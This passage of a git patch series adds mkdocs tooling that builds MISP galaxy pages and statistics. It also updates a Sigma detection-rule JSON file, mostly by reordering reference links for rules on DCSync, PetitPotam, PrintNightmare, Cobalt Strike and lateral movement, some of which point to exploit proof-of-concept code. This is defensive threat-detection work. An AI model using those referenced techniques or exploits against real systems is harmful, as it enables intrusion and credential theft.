related_clusters = self.get_related_clusters(cluster_dict) + self.statistics.relation_count_dict[self.uuid] = len(related_clusters) + galaxy_path = os.path.join(path, self.galaxy.json_file_name) + if not os.path.exists(galaxy_path): + os.mkdir(galaxy_path) + relation_path = os.path.join(galaxy_path, "relations") + if not os.path.exists(relation_path): + os.mkdir(relation_path) + with open(os.path.join(relation_path, ".pages"), "w") as index: + index.write(f"hide: true\n") + with open(os.path.join(relation_path, f"{self.uuid}.md"), "w") as index: + index.write(self._get_related_entry(related_clusters)) diff --git a/tools/mkdocs/modules/galaxy.py b/tools/mkdocs/modules/galaxy.py new file mode 100644 index 0000000..f45a6d0 --- /dev/null +++ b/tools/mkdocs/modules/galaxy.py @@ -0,0 +1,74 @@ +from modules.cluster import Cluster +from typing import List +import os + +class Galaxy: + def __init__( + self, cluster_list: List[dict], authors, description, name, json_file_name + ): + self.cluster_list = cluster_list + self.authors = authors + self.description = description + self.name = name + self.json_file_name = json_file_name + self.clusters = self._create_clusters() + self.entry = "" + + def _create_metadata_entry(self): + self.entry += "---\n" + self.entry += f"title: {self.name}\n" + meta_description = self.description.replace('"', "-") + self.entry += f"description: {meta_description}\n" + self.entry += "---\n" + + def _create_title_entry(self): + self.entry += f"# {self.name}\n" + + def _create_description_entry(self): + self.entry += f"{self.description}\n" + + def _create_authors_entry(self): + if self.authors: + self.entry += f"\n" + self.entry += f'??? info "Authors"\n' + self.entry += f"\n" + self.entry += f" | Authors and/or Contributors|\n" + self.entry += f" |----------------------------|\n" + for author in self.authors: + self.entry += f" |{author}|\n" + + def _create_clusters(self): + clusters = [] + for cluster in self.cluster_list: + clusters.append( + Cluster( + value=cluster.get("value", None), + description=cluster.get("description", None), + uuid=cluster.get("uuid", None), + date=cluster.get("date", None), + related_list=cluster.get("related", None), + meta=cluster.get("meta", None), + galaxy=self, + ) + ) + return clusters + + def _create_clusters_entry(self, cluster_dict, path): + for cluster in self.clusters: + self.entry += cluster.create_entry(cluster_dict, path) + + def create_entry(self, cluster_dict, path): + self._create_metadata_entry() + self._create_title_entry() + self._create_description_entry() + self._create_authors_entry() + self._create_clusters_entry(cluster_dict, path) + return self.entry + + def write_entry(self, path, cluster_dict): + self.create_entry(cluster_dict, path) + galaxy_path = os.path.join(path, self.json_file_name) + if not os.path.exists(galaxy_path): + os.mkdir(galaxy_path) + with open(os.path.join(galaxy_path, "index.md"), "w") as index: + index.write(self.entry) \ No newline at end of file diff --git a/tools/mkdocs/modules/statistics.py b/tools/mkdocs/modules/statistics.py new file mode 100644 index 0000000..a1c986a --- /dev/null +++ b/tools/mkdocs/modules/statistics.py @@ -0,0 +1,118 @@ +from utils.helper import get_top_x, name_to_section +import os + + +class Statistics: + def __init__(self, cluster_dict): + self.public_relations_count = 0 + self.private_relations_count = 0 + self.private_clusters = [] + self.public_clusters_dict = {} + self.relation_count_dict = {} + self.synonyms_count_dict = {} + self.empty_uuids_dict = {} + self.cluster_dict = cluster_dict + self.entry = "" + + def create_entry(self): + self.entry += f"# MISP Galaxy statistics\n" + self.entry += "The MISP galaxy statistics are automatically generated based on the MISP galaxy JSON files. Therefore the statistics only include detailed infomration about public clusters and relations. Some statistics about private clusters and relations is included but only as an approximation based on the information gathered from the public clusters.\n" + self.entry += "\n" + self._create_cluster_statistics() + self._create_galaxy_statistics() + self._create_relation_statistics() + self._create_synonym_statistics() + + def _create_galaxy_statistics(self): + self.entry += f"# Galaxy statistics\n" + self.entry += f"## Galaxies with the most clusters\n" + galaxy_counts = {} + for galaxy in self.public_clusters_dict.values(): + galaxy_counts[galaxy] = galaxy_counts.get(galaxy, 0) + 1 + top_galaxies, top_galaxies_values = get_top_x(galaxy_counts, 20) + self.entry += f" | No. | Galaxy | Count {{ .log-bar-chart }}|\n" + self.entry += f" |----|--------|-------|\n" + for i, galaxy in enumerate(top_galaxies, 1): + galaxy_section = name_to_section(galaxy.json_file_name) + self.entry += f" | {i} | [{galaxy.name}](../{galaxy_section}) | {top_galaxies_values[i-1]} |\n" + self.entry += f"\n" + + self.entry += f"## Galaxies with the least clusters\n" + flop_galaxies, flop_galaxies_values = get_top_x(galaxy_counts, 20, False) + self.entry += f" | No. | Galaxy | Count {{ .bar-chart }}|\n" + self.entry += f" |----|--------|-------|\n" + for i, galaxy in enumerate(flop_galaxies, 1): + galaxy_section = name_to_section(galaxy.json_file_name) + self.entry += f" | {i} | [{galaxy.name}](../{galaxy_section}) | {flop_galaxies_values[i-1]} |\n" + self.entry += f"\n" + + def _create_cluster_statistics(self): + self.entry += f"# Cluster statistics\n" + self.entry += f"## Number of clusters\n" + self.entry += f"Here you can find the total number of clusters including public and private clusters. The number of public clusters has been calculated based on the number of unique Clusters in the MISP galaxy JSON files. The number of private clusters could only be approximated based on the number of relations to non-existing clusters. Therefore the number of private clusters is not accurate and only an approximation.\n" + self.entry += f"\n" + self.entry += f"| No. | Type | Count {{ .pie-chart }}|\n" + self.entry += f"|-----|------|-----------------------|\n" + self.entry += f"| 1 | Public clusters | {len(self.public_clusters_dict)} |\n" + self.entry += f"| 2 | Private clusters | {len(self.private_clusters)} |\n" + self.entry += f"\n" + + def _create_relation_statistics(self): + self.entry += f"# Relation statistics\n" + self.entry += f"Here you can find the total number of relations including public and private relations. The number includes relations between public clusters and relations between public and private clusters. Therefore relatons between private clusters are not included in the statistics.\n" + self.entry += f"\n" + self.entry += f"## Number of relations\n" + self.entry += f"| No. | Type | Count {{ .pie-chart }}|\n" + self.entry += f"|----|------|-------|\n" + self.entry += f"| 1 | Public relations | {self.public_relations_count} |\n" + self.entry += f"| 2 | Private relations | {self.private_relations_count} |\n" + self.entry += f"\n" + + self.entry += f"**Average number of relations per cluster**: {int(sum(self.relation_count_dict.values()) / len(self.relation_count_dict))}\n" + + self.entry += f"## Cluster with the most relations\n" + relation_count_dict_names = { + self.cluster_dict[uuid].value: count + for uuid, count in self.relation_count_dict.items() + } + top_25_relation, top_25_relation_values = get_top_x( + relation_count_dict_names, 20 + ) + self.entry += f" | No. | Cluster | Count {{ .bar-chart }}|\n" + self.entry += f" |----|--------|-------|\n" + relation_count_dict_galaxies = { + self.cluster_dict[uuid].value: self.cluster_dict[uuid].galaxy.json_file_name + for uuid in self.relation_count_dict.keys() + } + for i, cluster in enumerate(top_25_relation, 1): + cluster_section = name_to_section(cluster) + self.entry += f" | {i} | [{cluster}](../{relation_count_dict_galaxies[cluster]}/#{cluster_section}) | {top_25_relation_values[i-1]} |\n" + self.entry += f"\n" + + def _create_synonym_statistics(self): + self.entry += f"# Synonym statistics\n" + self.entry += f"## Cluster with the most synonyms\n" + synonyms_count_dict_names = { + self.cluster_dict[uuid].value: count + for uuid, count in self.synonyms_count_dict.items() + } + top_synonyms, top_synonyms_values = get_top_x(synonyms_count_dict_names, 20) + self.entry += f" | No. | Cluster | Count {{ .bar-chart }}|\n" + self.entry += f" |----|--------|-------|\n" + synonyms_count_dict_galaxies = { + self.cluster_dict[uuid].value: self.cluster_dict[uuid].galaxy.json_file_name + for uuid in self.synonyms_count_dict.keys() + } + for i, cluster in enumerate(top_synonyms, 1): + cluster_section = name_to_section(cluster) + self.entry += f" | {i} | [{cluster}](../{synonyms_count_dict_galaxies[cluster]}/#{cluster_section}) | {top_synonyms_values[i-1]} |\n" + self.entry += f"\n" + + def write_entry(self, path): + self.create_entry() + with open(os.path.join(path, "statistics.md"), "w") as index: + index.write(self.entry) + + def add_cluster(self, cluster): + self.public_clusters_dict[cluster.uuid] = cluster.galaxy + cluster.statistics = self diff --git a/tools/mkdocs/utils/__init__.py b/tools/mkdocs/utils/__init__.py new file mode 100644 index 0000000..e69de29 diff --git a/tools/mkdocs/utils/helper.py b/tools/mkdocs/utils/helper.py new file mode 100644 index 0000000..5be772d --- /dev/null +++ b/tools/mkdocs/utils/helper.py @@ -0,0 +1,21 @@ +import operator + +def get_top_x(dict, x, big_to_small=True): + sorted_dict = sorted( + dict.items(), key=operator.itemgetter(1), reverse=big_to_small + )[:x] + top_x = [key for key, value in sorted_dict] + top_x_values = sorted(dict.values(), reverse=big_to_small)[:x] + return top_x, top_x_values + + +def name_to_section(name): + placeholder = "__TMP__" + return ( + name.lower() + .replace(" - ", placeholder) # Replace " - " first + .replace(" ", "-") + .replace("/", "") + .replace(":", "") + .replace(placeholder, "-") + ) # Replace the placeholder with "-" \ No newline at end of file From 5d24d645d399c891d9640090e579abb9dfdfc518 Mon Sep 17 00:00:00 2001 From: niclas Date: Tue, 27 Feb 2024 11:06:36 +0100 Subject: [PATCH 12/49] ref [cluster] remove duplicates --- tools/mkdocs/modules/cluster.py | 37 +++++++++++++-------------------- 1 file changed, 14 insertions(+), 23 deletions(-) diff --git a/tools/mkdocs/modules/cluster.py b/tools/mkdocs/modules/cluster.py index 06a5f24..2ecfde7 100644 --- a/tools/mkdocs/modules/cluster.py +++ b/tools/mkdocs/modules/cluster.py @@ -12,10 +12,14 @@ class Cluster: self.value = value self.related_list = related_list self.meta = meta - self.entry = "" self.galaxy = galaxy + + self.entry = "" self.statistics = None + def __lt__(self, other): + return self.uuid < other.uuid + def set_statistics(self, statistics): self.statistics = statistics @@ -156,32 +160,19 @@ class Cluster: if empty_uuids > 0: self.statistics.empty_uuids_dict[self.value] = empty_uuids - # Remove duplicates - to_remove = set() + return self._remove_duplicates(related_clusters) + + def _remove_duplicates(self, related_clusters): cluster_dict = {} for cluster in related_clusters: - key1 = (cluster[0], cluster[1]) - key2 = (cluster[1], cluster[0]) - - if key1 in cluster_dict: - if cluster_dict[key1][2] > cluster[2]: - to_remove.add(cluster_dict[key1]) - cluster_dict[key1] = cluster - else: - to_remove.add(cluster) - - elif key2 in cluster_dict: - if cluster_dict[key2][2] > cluster[2]: - to_remove.add(cluster_dict[key2]) - cluster_dict[key2] = cluster - else: - to_remove.add(cluster) + key = tuple(sorted((cluster[0], cluster[1]))) + if key in cluster_dict: + if cluster_dict[key][2] > cluster[2]: + cluster_dict[key] = cluster else: - cluster_dict[key1] = cluster - related_clusters = [ - cluster for cluster in related_clusters if cluster not in to_remove - ] + cluster_dict[key] = cluster + related_clusters = list(cluster_dict.values()) return related_clusters From 838f6497660af602c5d7bde93ce34be1783287dd Mon Sep 17 00:00:00 2001 From: Alexandre Dulaunoy Date: Tue, 27 Feb 2024 14:10:36 +0100 Subject: [PATCH 13/49] chg: [sigma] updated to the latest version --- clusters/sigma-rules.json | 4763 ++++++++++++++++++++----------------- 1 file changed, 2514 insertions(+), 2249 deletions(-) diff --git a/clusters/sigma-rules.json b/clusters/sigma-rules.json index bc28035..a1dce04 100644 --- a/clusters/sigma-rules.json +++ b/clusters/sigma-rules.json @@ -76,9 +76,9 @@ "logsource.category": "firewall", "logsource.product": "No established product", "refs": [ - "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf", - "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf", "https://www.cisecurity.org/controls/cis-controls-list/", + "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf", + "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/network/firewall/net_firewall_cleartext_protocols.yml" ], "tags": [ @@ -101,10 +101,10 @@ "logsource.category": "dns", "logsource.product": "No established product", "refs": [ - "https://core.telegram.org/bots/faq", - "https://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/", - "https://researchcenter.paloaltonetworks.com/2018/03/unit42-telerat-another-android-trojan-leveraging-telegrams-bot-api-to-target-iranian-users/", "https://blog.malwarebytes.com/threat-analysis/2016/11/telecrypt-the-ransomware-abusing-telegram-api-defeated/", + "https://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/", + "https://core.telegram.org/bots/faq", + "https://researchcenter.paloaltonetworks.com/2018/03/unit42-telerat-another-android-trojan-leveraging-telegrams-bot-api-to-target-iranian-users/", "https://github.com/SigmaHQ/sigma/tree/master/rules/network/dns/net_dns_susp_telegram_api.yml" ], "tags": [ @@ -179,8 +179,8 @@ "logsource.category": "dns", "logsource.product": "No established product", "refs": [ - "https://www.icebrg.io/blog/footprints-of-fin7-tracking-actor-patterns", "https://www.sekoia.io/en/hunting-and-detecting-cobalt-strike/", + "https://www.icebrg.io/blog/footprints-of-fin7-tracking-actor-patterns", "https://github.com/SigmaHQ/sigma/tree/master/rules/network/dns/net_dns_mal_cobaltstrike.yml" ], "tags": [ @@ -1184,8 +1184,8 @@ "logsource.category": "No established category", "logsource.product": "zeek", "refs": [ - "https://msrc.microsoft.com/update-guide/vulnerability/ADV210003", "https://github.com/topotam/PetitPotam/blob/d83ac8f2dd34654628c17490f99106eb128e7d1e/PetitPotam/PetitPotam.cpp", + "https://msrc.microsoft.com/update-guide/vulnerability/ADV210003", "https://threatpost.com/microsoft-petitpotam-poc/168163/", "https://vx-underground.org/archive/Symantec/windows-vista-network-attack-07-en.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dce_rpc_potential_petit_potam_efs_rpc_call.yml" @@ -1565,8 +1565,8 @@ "logsource.category": "No established category", "logsource.product": "zeek", "refs": [ - "https://github.com/nknorg/nkn-sdk-go", "https://github.com/Maka8ka/NGLite", + "https://github.com/nknorg/nkn-sdk-go", "https://unit42.paloaltonetworks.com/manageengine-godzilla-nglite-kdcsponge/", "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dns_nkn.yml" ], @@ -1624,8 +1624,8 @@ "logsource.category": "No established category", "logsource.product": "zeek", "refs": [ - "https://posts.specterops.io/hunting-in-active-directory-unconstrained-delegation-forests-trusts-71f2b33688e1", "https://dirkjanm.io/a-different-way-of-abusing-zerologon/", + "https://posts.specterops.io/hunting-in-active-directory-unconstrained-delegation-forests-trusts-71f2b33688e1", "https://twitter.com/_dirkjan/status/1309214379003588608", "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dce_rpc_smb_spoolss_named_pipe.yml" ], @@ -1701,12 +1701,12 @@ "logsource.category": "No established category", "logsource.product": "zeek", "refs": [ - "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-par/93d1915d-4d9f-4ceb-90a7-e8f2a59adc29", + "https://github.com/corelight/CVE-2021-1675", "https://www.crowdstrike.com/blog/cve-2021-1678-printer-spooler-relay-security-advisory/", "https://old.zeek.org/zeekweek2019/slides/bzar.pdf", - "https://github.com/zeek/zeek/blob/691b099de13649d6576c7b9d637f8213ff818832/scripts/base/protocols/dce-rpc/consts.zeek", - "https://github.com/corelight/CVE-2021-1675", "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-par/93d1915d-4d9f-4ceb-90a7-e8f2a59adc29", + "https://github.com/zeek/zeek/blob/691b099de13649d6576c7b9d637f8213ff818832/scripts/base/protocols/dce-rpc/consts.zeek", "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dce_rpc_printnightmare_print_driver_install.yml" ], "tags": [ @@ -1839,9 +1839,9 @@ "logsource.category": "No established category", "logsource.product": "zeek", "refs": [ - "https://www.netresec.com/?page=Blog&month=2021-01&post=Finding-Targeted-SUNBURST-Victims-with-pDNS", - "https://twitter.com/neu5ron/status/1346245602502443009", "https://tools.ietf.org/html/rfc2929#section-2.1", + "https://twitter.com/neu5ron/status/1346245602502443009", + "https://www.netresec.com/?page=Blog&month=2021-01&post=Finding-Targeted-SUNBURST-Victims-with-pDNS", "https://tdm.socprime.com/tdm/info/eLbyj4JjI15v#sigma", "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dns_susp_zbit_flag.yml" ], @@ -2151,9 +2151,9 @@ "logsource.category": "application", "logsource.product": "jvm", "refs": [ - "https://rules.sonarsource.com/java/RSPEC-2755", - "https://owasp.org/www-community/vulnerabilities/XML_External_Entity_(XXE)_Processing", "https://www.wix.engineering/post/threat-and-vulnerability-hunting-with-application-server-error-logs", + "https://owasp.org/www-community/vulnerabilities/XML_External_Entity_(XXE)_Processing", + "https://rules.sonarsource.com/java/RSPEC-2755", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/jvm/java_xxe_exploitation_attempt.yml" ], "tags": [ @@ -2253,10 +2253,10 @@ "logsource.category": "application", "logsource.product": "ruby_on_rails", "refs": [ - "http://guides.rubyonrails.org/action_controller_overview.html", "https://github.com/rails/rails/blob/cd08e6bcc4cd8948fe01e0be1ea0c7ca60373a25/actionpack/lib/action_dispatch/middleware/exception_wrapper.rb", "http://edgeguides.rubyonrails.org/security.html", "https://stackoverflow.com/questions/25892194/does-rails-come-with-a-not-authorized-exception", + "http://guides.rubyonrails.org/action_controller_overview.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/ruby/appframework_ruby_on_rails_exceptions.yml" ], "tags": [ @@ -2289,10 +2289,10 @@ "logsource.category": "application", "logsource.product": "rpc_firewall", "refs": [ - "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-WKST.md", - "https://github.com/zeronetworks/rpcfirewall", - "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-wkst/55118c55-2122-4ef9-8664-0c1ff9e168f3", "https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-wkst/55118c55-2122-4ef9-8664-0c1ff9e168f3", + "https://github.com/zeronetworks/rpcfirewall", + "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-WKST.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_sharphound_recon_account.yml" ], "tags": [ @@ -2325,9 +2325,9 @@ "logsource.category": "application", "logsource.product": "rpc_firewall", "refs": [ - "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-RRP.md", "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rrp/0fa3191d-bb79-490a-81bd-54c2601b7a78", "https://github.com/zeronetworks/rpcfirewall", + "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-RRP.md", "https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_remote_registry_recon.yml" ], @@ -2351,9 +2351,9 @@ "logsource.category": "application", "logsource.product": "rpc_firewall", "refs": [ + "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md", "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931", "https://github.com/zeronetworks/rpcfirewall", - "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md", "https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_itaskschedulerservice_recon.yml" ], @@ -2377,9 +2377,9 @@ "logsource.category": "application", "logsource.product": "rpc_firewall", "refs": [ + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-srvs/accf23b0-0f57-441c-9185-43041f1b0ee9", "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-SCMR.md", "https://github.com/zeronetworks/rpcfirewall", - "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-srvs/accf23b0-0f57-441c-9185-43041f1b0ee9", "https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_remote_service_lateral_movement.yml" ], @@ -2413,9 +2413,9 @@ "logsource.category": "application", "logsource.product": "rpc_firewall", "refs": [ + "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md", "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931", "https://github.com/zeronetworks/rpcfirewall", - "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md", "https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_atsvc_lateral_movement.yml" ], @@ -2458,8 +2458,8 @@ "logsource.product": "rpc_firewall", "refs": [ "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-drsr/f977faaa-673e-4f66-b9bf-48c640241d47?redirectedfrom=MSDN", - "https://github.com/zeronetworks/rpcfirewall", "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-DRSR.md", + "https://github.com/zeronetworks/rpcfirewall", "https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_dcsync_attack.yml" ], @@ -2517,9 +2517,9 @@ "logsource.category": "application", "logsource.product": "rpc_firewall", "refs": [ + "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md", "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931", "https://github.com/zeronetworks/rpcfirewall", - "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md", "https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_itaskschedulerservice_lateral_movement.yml" ], @@ -2561,8 +2561,8 @@ "logsource.category": "application", "logsource.product": "rpc_firewall", "refs": [ - "https://github.com/zeronetworks/rpcfirewall", "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-srvs/accf23b0-0f57-441c-9185-43041f1b0ee9", + "https://github.com/zeronetworks/rpcfirewall", "https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_remote_dcom_or_wmi.yml" ], @@ -2604,9 +2604,9 @@ "logsource.category": "application", "logsource.product": "rpc_firewall", "refs": [ + "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md", "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931", "https://github.com/zeronetworks/rpcfirewall", - "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md", "https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_sasec_lateral_movement.yml" ], @@ -2648,12 +2648,12 @@ "logsource.category": "application", "logsource.product": "rpc_firewall", "refs": [ - "https://github.com/zeronetworks/rpcfirewall", + "https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/", "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-RPRN-PAR.md", + "https://github.com/zeronetworks/rpcfirewall", "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/d42db7d5-f141-4466-8f47-0a4be14e2fc1", "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527", "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-pan/e44d984c-07d3-414c-8ffc-f8c8ad8512a8", - "https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_printing_lateral_movement.yml" ], "tags": [ @@ -2676,10 +2676,10 @@ "logsource.category": "application", "logsource.product": "rpc_firewall", "refs": [ - "https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/", - "https://github.com/zeronetworks/rpcfirewall", - "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-srvs/02b1f559-fda2-4ba3-94c2-806eb2777183", "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-SRVS.md", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-srvs/02b1f559-fda2-4ba3-94c2-806eb2777183", + "https://github.com/zeronetworks/rpcfirewall", + "https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_sharphound_recon_sessions.yml" ], "tags": [ @@ -2711,10 +2711,10 @@ "logsource.category": "application", "logsource.product": "rpc_firewall", "refs": [ - "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36942", + "https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/", "https://github.com/zeronetworks/rpcfirewall", "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-EFSR.md", - "https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/", + "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36942", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_efs_abuse.yml" ], "tags": [ @@ -2737,9 +2737,9 @@ "logsource.category": "application", "logsource.product": "rpc_firewall", "refs": [ + "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md", "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931", "https://github.com/zeronetworks/rpcfirewall", - "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md", "https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_sasec_recon.yml" ], @@ -2763,9 +2763,9 @@ "logsource.category": "application", "logsource.product": "rpc_firewall", "refs": [ - "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-RRP.md", "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rrp/0fa3191d-bb79-490a-81bd-54c2601b7a78", "https://github.com/zeronetworks/rpcfirewall", + "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-RRP.md", "https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_remote_registry_lateral_movement.yml" ], @@ -2799,10 +2799,10 @@ "logsource.category": "application", "logsource.product": "rpc_firewall", "refs": [ - "https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/", - "https://github.com/zeronetworks/rpcfirewall", "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-srvs/accf23b0-0f57-441c-9185-43041f1b0ee9", + "https://github.com/zeronetworks/rpcfirewall", "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-SRVS.md", + "https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_remote_server_service_abuse.yml" ], "tags": [ @@ -2825,9 +2825,9 @@ "logsource.category": "application", "logsource.product": "rpc_firewall", "refs": [ + "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md", "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931", "https://github.com/zeronetworks/rpcfirewall", - "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md", "https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_atsvc_recon.yml" ], @@ -2852,8 +2852,8 @@ "logsource.category": "application", "logsource.product": "velocity", "refs": [ - "https://antgarsil.github.io/posts/velocity/", "https://www.wix.engineering/post/threat-and-vulnerability-hunting-with-application-server-error-logs", + "https://antgarsil.github.io/posts/velocity/", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/velocity/velocity_ssti_injection.yml" ], "tags": [ @@ -2970,8 +2970,8 @@ "logsource.category": "process_access", "logsource.product": "windows", "refs": [ - 